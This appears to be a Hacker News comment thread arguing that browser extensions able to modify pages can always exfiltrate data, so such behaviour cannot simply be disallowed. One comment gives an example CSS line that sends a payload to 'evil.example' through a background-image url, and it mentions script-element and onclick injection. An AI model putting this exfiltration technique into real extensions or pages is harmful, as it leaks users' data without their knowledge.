Lots of the best extensions are basically "change this webpage when it loads to make it work better." You can't "disallow this behavior" without crippling them.
>It could do all the processing locally, easily...
That's irrelevant. If you can make changes to the page, you can exfiltrate data. The security model for addons isn't designed with restricting an addon's network activity in mind, see my other post: https://news.ycombinator.com/item?id=25623281
Depends on what your addons does. Most addons modify the page in some way. It's also not limited to injecting javascript. You can also exfiltrate data by injecting css (eg. doing something like background-image: url("http://evil.example/?payload=...")) or do javascript injection in alternate ways (eg. adding a <script> element, or adding an onclick attribute).
disallow that behavior?
You could also just pull that code but it might change based on request origin...